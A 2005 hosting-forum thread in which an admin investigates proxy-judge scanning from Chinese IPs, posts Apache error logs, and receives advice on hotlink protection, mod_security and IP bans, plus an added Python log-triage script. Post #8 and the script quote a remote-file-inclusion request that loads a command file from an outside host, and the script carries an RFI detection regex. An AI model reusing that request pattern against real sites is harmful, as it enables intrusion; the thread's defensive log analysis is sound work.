#1 (Join Date: Nov 2004, Location: Marietta PA, Posts: 137)

    Odd page visits and large hit count

Over the last few days I have noticed that my visits from China have greatly increased, which is never a good thing (no offense to anyone from that area).

In the AWStats section where it shows you the most visited pages, I am seeing page hits for URLs on other servers instead. 99% of these links lead to a prxjdg - created by PRX4EVER with site address http://prx4ever.virtualave.net/ps/ (the link no longer exists).

I have attached a screenshot of the AWStats.

Whatever this is, it has eaten up 200 MB of bandwidth overnight, which is not a big deal currently.

I have run rkhunter and chkrootkit and both give a clean bill of health.
The netstat output does not show any weird ports open, though it shows about 50 China IP addresses connected to my IP via port 80.

My website (not the hosting one) shows a who-is-online count of over 100 users lately.

Now, the site I mention is running Mambo 4.5.2.1. It is also the first site that was added to our cPanel server, so I sometimes see hits for the other domains in our logs, i.e. people going to whois.sc for another domain on the server show up in my AWStats.

The server is Fedora Core 2 protected with the APF firewall.

I don't know if this is a new attack, because I just saw it start up on the 1st of June. I have checked server logs and do not see anything weird; the temp dir has the t bit and there is nothing hidden in there.

If anyone has any thoughts on this, please give us a shout or post in here.

Oh yeah, and tcpdump and Ethereal do not show any strange traffic on the NIC, though I see many repeat hits from the same IPs on port 80, sometimes a few hundred at a time.
    Digital Offensive
    http://www.digitaloffensive.com
    Take an offensive approach to Security know what your foes know!

#3 (Join Date: Oct 2004, Posts: 133)
Browse through the account's folders.
See if there are any unusual files.
It is possible that somebody hopes to exceed the bandwidth for this site. This is just a suggestion and a possible reason.

The lack of a logical reason for this is even more disturbing.
I believe you would have felt better if you had found something.
If there is nothing, absolutely nothing strange, my guess is that
somebody wishes to force you to exceed your bandwidth.

    I hope that somebody will manage to help you.

#4 (Join Date: Nov 2004, Location: Marietta PA, Posts: 137)
Arny, thanks. I am not worrying about the bandwidth, but you are right, I would have felt better if the logs showed something or if a trojan had been found. I have 2000 GB to use and the server with all the sites on it has never broken 20 GB.

#5 (Join Date: Dec 2004, Posts: 223)
Have you enabled hotlink protection? Other domains can steal your bandwidth that way.

#6 (Join Date: Dec 2004, Posts: 223)
Also, you could disable directory indexing for the folders which needn't be accessed using URLs.

#7 (Join Date: Nov 2004, Location: Marietta PA, Posts: 137)
No, I haven't, but I can do that. The issue, though, is that I don't think they are linking to my files, especially since all the links involved are proxy checking servers.

Though thanks for the tip.

#8 (Join Date: Dec 2004, Posts: 223)
Do you have mod_security installed? You can set up custom filters to stop access to other URLs using your domain in the browser. Check the Apache domlogs for this domain and you should be able to see entries like:

...GET /index.php?conf=http://www.domain.com/.../newcmd.gif.....

something like this.

Check if these are from a particular IP.

#9 (Join Date: Oct 2004, Posts: 133)
And if they are from particular IP addresses or a whole IP range, I'm thinking of one nice IP ban.

#10 (Join Date: Nov 2004, Location: Marietta PA, Posts: 137)
Yeah, I am thinking of blocking China for a few days.

#11 (Join Date: Nov 2004, Location: Marietta PA, Posts: 137)
Here is more info. It looks like all the scripts these people are looking for don't exist, though I already knew that. I guess there is a new hack out there searching for vulnerable scripts:

[Fri Jun 3 11:04:56 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:56 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:04:34 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:34 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:04:31 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:31 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/~mana_/prxjdg.cgi
    [Fri Jun 3 11:04:28 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:28 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:04:18 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:18 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
    [Fri Jun 3 11:04:14 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:14 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:04:13 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:13 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
    [Fri Jun 3 11:04:11 2005] [error] [client 218.56.238.75] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:11 2005] [error] [client 218.56.238.75] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:04:06 2005] [error] [client 218.56.238.75] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:04:06 2005] [error] [client 218.56.238.75] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:56 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:56 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
    [Fri Jun 3 11:03:53 2005] [error] [client 218.56.239.72] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:53 2005] [error] [client 218.56.239.72] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:39 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:39 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:32 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:32 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
    [Fri Jun 3 11:03:28 2005] [error] [client 218.56.239.72] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:28 2005] [error] [client 218.56.239.72] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:27 2005] [error] [client 218.56.232.152] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:27 2005] [error] [client 218.56.232.152] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:25 2005] [error] [client 218.56.239.32] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:25 2005] [error] [client 218.56.239.32] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
    [Fri Jun 3 11:03:04 2005] [error] [client 218.56.237.242] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:03:04 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
    [Fri Jun 3 11:02:44 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:02:44 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:02:32 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:02:32 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:02:28 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:02:28 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
    [Fri Jun 3 11:02:09 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:02:09 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
    [Fri Jun 3 11:02:07 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
    [Fri Jun 3 11:02:07 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi

As you can see they are all China IPs, which have now been blocked.
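The triage that posts #8 and #11 describe by hand (spot the probes in the error log, spot RFI-style requests in the domlogs, check whether they cluster on particular IPs) can be automated. The script below is an added example written for this page, not code from the thread or from AWStats, APF or BFD. The log lines it contains are constructed for the example, modelled on the error_log excerpt in post #11 and on the `index.php?conf=http://...` request pattern in post #8; the script names in `PROBE_NAMES` are the ones that appear in that excerpt. The "404.shtml" lines are treated as noise because each one is Apache failing to serve its custom error page right after a miss, not a second probe.

```python
"""Triage Apache logs for clients probing for proxy-judge / CGI scripts.

Added example for this thread, not code from any of the tools it names.
All log lines below are constructed, modelled on posts #8 and #11.
"""
import re
from collections import defaultdict

# Constructed error_log sample (Apache 1.3 format, as in the thread).  Every
# probe is followed by a "404.shtml" miss: Apache tries to serve the custom
# error page after the miss and that file is absent, so that line is noise.
ERROR_LOG = """\
[Fri Jun 3 11:04:56 2005] [error] [client 218.74.201.40] File does not exist: /home/xxxx/public_html/404.shtml
[Fri Jun 3 11:04:56 2005] [error] [client 218.74.201.40] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/smartsearch.cgi
[Fri Jun 3 11:04:31 2005] [error] [client 218.56.238.52] File does not exist: /home/xxxx/public_html/~mana_/prxjdg.cgi
[Fri Jun 3 11:04:18 2005] [error] [client 218.56.237.242] script not found or unable to stat: /home/xxxx/public_html/ip.cgi
[Fri Jun 3 11:04:13 2005] [error] [client 218.56.238.52] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/proxycheck.pl
[Fri Jun 3 11:04:11 2005] [error] [client 218.56.238.75] script not found or unable to stat: /home/xxxx/public_html/cgi-bin/search
[Fri Jun 3 11:03:00 2005] [error] [client 10.0.0.7] File does not exist: /home/xxxx/public_html/favicon.ico
"""

# Constructed access_log sample (combined format).  The first request is the
# remote-file-inclusion shape post #8 describes; the host name is made up.
ACCESS_LOG = """\
218.56.238.52 - - [03/Jun/2005:11:05:02 -0400] "GET /index.php?conf=http://www.example.org/x/newcmd.gif? HTTP/1.1" 200 512 "-" "Mozilla"
10.0.0.7 - - [03/Jun/2005:11:05:10 -0400] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 8120 "-" "Mozilla"
218.74.201.40 - - [03/Jun/2005:11:05:30 -0400] "GET /cgi-bin/smartsearch.cgi HTTP/1.0" 404 230 "-" "-"
"""

ERROR_RE = re.compile(
    r"\[client (?P<ip>[\d.]+)\] "
    r"(?P<msg>File does not exist|script not found or unable to stat): (?P<path>\S+)"
)
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+)')

# Script names requested in the thread's excerpt: proxy-judge / open-proxy
# checkers and a couple of CGI search scripts.  One hit on any of them from a
# client that does not otherwise use the site is enough to call it a scanner.
PROBE_NAMES = {"prxjdg.cgi", "proxycheck.pl", "smartsearch.cgi", "ip.cgi", "search"}

# A query parameter whose value starts with a URL scheme: the classic RFI shape.
RFI_RE = re.compile(r"[?&][^=&]+=(https?|ftp)://", re.IGNORECASE)


def parse_error_log(text):
    """Map each client IP to the basenames of the files it asked for and missed.

    The custom error page miss (404.shtml) is dropped so that one probe
    counts once.
    """
    probes = defaultdict(list)
    for line in text.splitlines():
        m = ERROR_RE.search(line)
        if not m:
            continue
        name = m.group("path").rsplit("/", 1)[-1]
        if name == "404.shtml":
            continue
        probes[m.group("ip")].append(name)
    return probes


def find_rfi_requests(text):
    """Return (ip, url) for every access_log request carrying a remote URL in its query."""
    hits = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m and RFI_RE.search(m.group("url")):
            hits.append((m.group("ip"), m.group("url")))
    return hits


def scanners(probes, min_probes=1):
    """IPs that requested at least min_probes of the known probe script names."""
    return sorted(
        ip for ip, names in probes.items()
        if sum(n in PROBE_NAMES for n in names) >= min_probes
    )


def block_list(error_text, access_text):
    """Scanner IPs plus RFI sources, sorted numerically, one address per entry."""
    ips = set(scanners(parse_error_log(error_text)))
    ips.update(ip for ip, _ in find_rfi_requests(access_text))
    return sorted(ips, key=lambda ip: tuple(int(o) for o in ip.split(".")))


if __name__ == "__main__":
    for ip, names in sorted(parse_error_log(ERROR_LOG).items()):
        print(f"{ip:16} probes: {', '.join(names)}")
    for ip, url in find_rfi_requests(ACCESS_LOG):
        print(f"{ip:16} RFI-style request: {url}")
    print("block:", " ".join(block_list(ERROR_LOG, ACCESS_LOG)))
```

Run it against the real files with `parse_error_log(open("/usr/local/apache/logs/error_log").read())` and the domlog for the domain in place of the samples. The output of `block_list` is a plain list of addresses, so it can be fed to `apf -d <ip> "proxy scanner"` one entry at a time; whether to widen individual addresses into the /16 or /24 they sit in, as the original poster ended up doing, is a judgement call the script leaves to the operator. Note that `10.0.0.7` is not listed: it only missed `favicon.ico`, which is an ordinary browser request, which is why the filter keys on the probed script names rather than on any 404.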

#12 (Join Date: Dec 2004, Posts: 223)
    As you've blocked those IPs, do you still have issues?

#13 (Join Date: Nov 2004, Location: Marietta PA, Posts: 137)
I installed BFD last night and it has blocked several hundred China IPs.
